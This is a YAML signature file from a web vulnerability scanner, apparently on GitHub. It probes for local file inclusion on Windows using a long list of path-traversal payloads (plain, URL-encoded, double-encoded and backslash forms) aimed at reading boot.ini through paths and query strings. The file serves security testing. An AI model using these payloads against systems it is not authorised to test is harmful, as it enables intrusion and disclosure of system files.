-
Notifications
You must be signed in to change notification settings - Fork 40
/
Copy pathlfi-windows.yaml
103 lines (101 loc) · 4.47 KB
/
lfi-windows.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
# info to search signature
id: lfi-windows
type: fuzz
info:
name: LFI on Windows
risk: High
payloads:
- '../boot.ini'
- '../../boot.ini'
- '../../../boot.ini'
- '../../../../boot.ini'
- '../../../../../boot.ini'
- '../../../../../../boot.ini'
- '../../../../../../../boot.ini'
- '../../../../../../../../boot.ini'
- '..%2fboot.ini'
- '..%2f..%2fboot.ini'
- '..%2f..%2f..%2fboot.ini'
- '..%2f..%2f..%2f..%2fboot.ini'
- '..%2f..%2f..%2f..%2f..%2fboot.ini'
- '..%2f..%2f..%2f..%2f..%2f..%2fboot.ini'
- '..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini'
- '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini'
- '%2e%2e/boot.ini'
- '%2e%2e/%2e%2e/boot.ini'
- '%2e%2e/%2e%2e/%2e%2e/boot.ini'
- '%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini'
- '%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini'
- '%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini'
- '%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini'
- '%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini'
- '%2e%2e%2fboot.ini'
- '%2e%2e%2f%2e%2e%2fboot.ini'
- '%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini'
- '%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini'
- '%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini'
- '%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini'
- '%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini'
- '%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini'
- '..%252fboot.ini'
- '..%252f..%252fboot.ini'
- '..%252f..%252f..%252fboot.ini'
- '..%252f..%252f..%252f..%252fboot.ini'
- '..%252f..%252f..%252f..%252f..%252fboot.ini'
- '..%252f..%252f..%252f..%252f..%252f..%252fboot.ini'
- '..%252f..%252f..%252f..%252f..%252f..%252f..%252fboot.ini'
- '..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fboot.ini'
- '%252e%252e/boot.ini'
- '%252e%252e/%252e%252e/boot.ini'
- '%252e%252e/%252e%252e/%252e%252e/boot.ini'
- '%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini'
- '%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini'
- '%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini'
- '%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini'
- '%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/boot.ini'
- '%252e%252e%252fboot.ini'
- '%252e%252e%252f%252e%252e%252fboot.ini'
- '%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini'
- '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini'
- '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini'
- '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini'
- '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini'
- '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fboot.ini'
- '..\boot.ini'
- '..\..\boot.ini'
- '..\..\..\boot.ini'
- '..\..\..\..\boot.ini'
- '..\..\..\..\..\boot.ini'
- '..\..\..\..\..\..\boot.ini'
- '..\..\..\..\..\..\..\boot.ini'
- '..\..\..\..\..\..\..\..\boot.ini'
- '..%255cboot.ini'
- '..%255c..%255cboot.ini'
- '..%255c..%255c..%255cboot.ini'
- '..%255c..%255c..%255c..%255cboot.ini'
- '..%255c..%255c..%255c..%255c..%255cboot.ini'
- '..%255c..%255c..%255c..%255c..%255c..%255cboot.ini'
- '..%255c..%255c..%255c..%255c..%255c..%255c..%255cboot.ini'
- '..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cboot.ini'
- '%252e%252e\boot.ini'
- '%252e%252e\%252e%252e\boot.ini..%5cboot.ini'
- '..%5c..%5cboot.ini'
- '..%5c..%5c..%5cboot.ini'
- '..%5c..%5c..%5c..%5cboot.ini'
- '..%5c..%5c..%5c..%5c..%5cboot.ini'
- '..%5c..%5c..%5c..%5c..%5c..%5cboot.ini'
- '..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini'
- '..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini'
- '%2e%2e\boot.ini'
- '%2e%2e\%2e%2e\boot.ini'
- '%2e%2e\%2e%2e\%2e%2e\boot.ini'
- '%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini'
- '%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini'
- '%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\boot.ini'
requests:
- generators:
- Path("{{.payload}}", "*")
- Query("{{.payload}}")
detections:
- >-
StatusCode() == 200 && RegexSearch("response", "for 16-bit app support|boot loader")